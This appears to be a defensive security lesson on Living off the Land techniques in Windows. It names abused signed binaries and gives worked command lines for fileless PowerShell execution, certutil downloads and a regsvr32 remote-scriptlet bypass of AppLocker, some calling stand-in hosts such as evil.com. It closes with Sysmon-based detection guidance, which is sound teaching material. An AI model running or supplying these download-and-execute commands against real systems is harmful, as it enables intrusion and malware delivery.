Malware's Perfect Disguise: Inside Advanced Code Injection

The shift away from custom binaries

Ten years ago, malware analysts spent most of their time on custom executables that the attacker had compiled and dropped on disk. Today, sophisticated operators avoid dropping anything. Instead, they use legitimate, signed Windows binaries already present on every machine — abusing them to download payloads, execute code, and bypass security controls. Security tools struggle to block these binaries because doing so would break legitimate administrative functions.

This is Living off the Land (LotL), and the abused binaries are LOLBins.

Why LotL works

A typical endpoint protection product maintains policies like "alert if powershell.exe invokes a network connection" — but powershell.exe is signed by Microsoft, used by sysadmins daily, and runs ordinary management tasks constantly. Alerts on every PowerShell invocation drown the SOC in noise. The defender's choice is to either accept the noise or write narrower rules — narrower rules attackers can side-step.

The asymmetry is the attacker's friend. They need one technique that survives every signature update. The defender needs to spot one signal in a million benign events.

The LOLBin catalogue

Binary	Abuse
powershell.exe	Execute encoded commands, download payloads (Invoke-WebRequest), run scripts in memory without touching disk
wmic.exe	Execute commands on remote machines, create processes, query system information; abused for lateral movement
mshta.exe	Execute VBScript or JavaScript embedded in .hta files; bypasses application whitelisting
msiexec.exe	Download and execute malicious .msi packages from a URL
certutil.exe	Download files (-urlcache -split -f), decode Base64 payloads (-decode); originally a certificate management tool
rundll32.exe	Execute arbitrary DLL exports; can also run JavaScript
regsvr32.exe	Register COM objects from remote .sct scriptlets, bypassing AppLocker
wscript.exe, cscript.exe	Execute VBScript / JScript files; common for phishing-borne payloads
bitsadmin.exe	Background Intelligent Transfer Service; download files silently

Each binary is signed, present in C:\Windows\System32, and indispensable to the OS.

Three abuse categories with worked examples

Fileless execution: PowerShell

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
  -Command "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"

This downloads and executes a script entirely in memory. No file touches disk. Breakdown:

• -NoProfile — skip the profile script (faster, fewer logs).
• -ExecutionPolicy Bypass — ignore signing requirements.
• -WindowStyle Hidden — no visible console window.
• IEX — Invoke-Expression, executes the downloaded string as PowerShell code.

Net.WebClient.DownloadString reads the URL into memory; IEX interprets the result. The malicious code never has a filename or a hash on the victim's filesystem. EDRs that focus on file-on-disk indicators see nothing.

File download: certutil

certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe
certutil.exe -decode encoded.txt payload.exe

certutil was designed for certificate management. It can also download arbitrary files (-urlcache -split -f) and decode Base64 (-decode). Both are essential for legitimate certificate workflows; both also serve attackers perfectly.

A SOC seeing certutil.exe make an outbound HTTP connection to an unfamiliar host should treat it as malicious until proven otherwise. Legitimate certutil usage almost never involves arbitrary URLs.

AppLocker bypass: regsvr32

regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Executes a remote scriptlet (.sct) containing VBScript or JScript. The flags:

• /s — silent mode (no dialog boxes).
• /n — do not call DllRegisterServer.
• /u — unregister mode (triggers the DllUnregisterServer path).
• /i:URL — passes the URL to the scriptlet handler.
• scrobj.dll — the Windows Script Component runtime.

This technique bypasses AppLocker's default policy because regsvr32.exe is a Microsoft-signed system binary that AppLocker permits by default.

Detection guidance

Pure signature-based detection cannot stop LotL. The defender's only effective tools are behavioural:

• Command-line argument monitoring. Sysmon Event ID 1 captures the full command line of every process. Patterns like powershell -enc <base64>, certutil -decode, mshta http: are highly suspicious.
• Parent-child process anomalies. winword.exe spawning powershell.exe is unusual. outlook.exe spawning mshta.exe is unusual. Map normal parent-child relationships and alert on deviations.
• Network egress from unexpected processes. certutil.exe making outbound HTTP, or regsvr32.exe resolving DNS for an external host — neither is normal.
• Encoded-command detection. PowerShell's -EncodedCommand flag with high-entropy Base64 payloads, especially long ones, is rarely benign.

Sysinternals Sysmon with a tuned config (Olaf Hartong's modular sysmon-config is the de facto standard) catches most of this with one log source.

What you should be comfortable with after this lesson

• Naming the major LOLBins and one abuse for each
• Reading a suspicious command line and identifying the abuse category
• Explaining why LotL is harder for defenders than custom-binary malware
• Configuring Sysmon to detect the most common abuse patterns